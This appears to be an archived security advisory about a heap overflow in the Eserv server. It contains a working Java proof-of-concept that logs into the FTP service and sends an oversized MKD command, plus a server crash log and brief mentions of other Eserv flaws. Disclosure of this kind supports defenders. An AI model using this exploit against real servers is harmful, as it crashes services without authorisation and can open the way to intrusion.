TUCoPS :: Web :: Servers

TUCoPS :: Web :: Servers :: eserv2.htm
Eserv remotely exploitable heap overflow
Vulnerability

    Eserv

Affected

    Eserv

Description

    Following is  based on  a MDMA  Advisory #6  by Andrew  Lewis aka.
    Wizdumb.   EServ  has  problems  handling  long  strings  in   its
    logging,  which  leads  it  to  have  a  remotely exploitable heap
    overflow.  The following code demonstrates the vulnerability...

    /* Proof of concept code for the heap overflow in EServ <= 2.9.2
     * Written 10/05/2000 by Andrew Lewis aka. Wizdumb [MDMA]
     */
    
    import java.io.*;
    import java.net.*;
    
    class eservheap {
    
    public static void main(String[] args) throws IOException {
    
      if (args.length < 1) {
        System.out.println("Syntax: java eservheap [host] <user> <pass>");
        System.exit(1); }
    
      Socket soq = null;
      PrintWriter white = null;
      BufferedReader weed = null;
    
      try {
        soq = new Socket(args[0], 21);
        white = new PrintWriter(soq.getOutputStream(), true);
        weed = new BufferedReader(new InputStreamReader(soq.getInputStream()));
      } catch (Exception e) {
        System.out.println("Problems connecting :-/");
        System.exit(1); }
    
      weed.readLine();
      String juzer = (args.length == 3) ? ("USER " + args[1]) : "USER anonymous";
      String pasz =  (args.length == 3) ? ("PASS " + args[2]) : "PASS mdma";
      white.println(juzer + "\n" + pasz);
      weed.readLine();
      weed.readLine();
    
      white.print("MKD ");
      for (int i = 0; i < 10000; i++) white.print("A");
      white.println(); // uNf! Who yoh daddy, bitch?
      weed.readLine();
      white.println("QUIT"); } }

    And no, you don't need write  access to the directory for that  to
    work  --  like  said  before.   The  heap  overflow  occurs in the
    logging.

    The following extract from e.log show the effect of this code...

        27.05.2000 17:02:19 Eserv/2.92 2986 1
        EXCEPTION!  CODE:C0000005  ADDRESS:49247E  WORD:C!  REGISTERS:
        1C5EC6C   50 62 34 00  36 5D 4E 00  FF 5F 34 00  0C 27 00 00
        Pb4.6]N.ر_4..'..
        1C5EC7C   E8 FD 00 00  41 00 00 00  48 FF C5 01  7E 24 49 00
        ةـ..A...Hره.~$I.
        1C5EC8C   1B 00 00 00  46 02 01 00  9C EE C5 01  23 00 00 00
        .....F..._ده.#...
        
        /* Ie. Thread crashes on MKD, but has no effect on other threads */
        
        USER DATA: 346250 HANDLER: 1C5EED0 RETURN STACK:
        1C5EE9C :  498BB9 C!
        1C5EEA0 :  4C2AF0 HOLD
        1C5EEA4 :  4CAC34 HOLDS
        /* these HOLDS are buggy - no length checking */
        1C5EEA8 :  7FFFE6FC <not in the image>
        1C5EEAC :  7FFFD8F4 <not in the image>
        1C5EEB0 :  4CAC49 HOLDS
        1C5EEB4 :  4E5E12 MKD
        1C5EEB8 :  49B279 |DROP
        1C5EEBC :  2 <not found>
        1C5EEC0 :  339DE8 <not found>
        1C5EEC4 :  270C <not found>
        1C5EEC8 :  4C42C1 INTERPRET
        1C5EECC :  4C303F NEW_CATCH
        1C5EED0 :  1C5EF14 <not in the image>

    It  may  also  be  worth  noting  that  EServ  has  the   /con/con
    vulnerability and  that older  versions shipped  with a vulnerable
    version of Ultimate Bulletin Board.

Solution

    Nothing yet.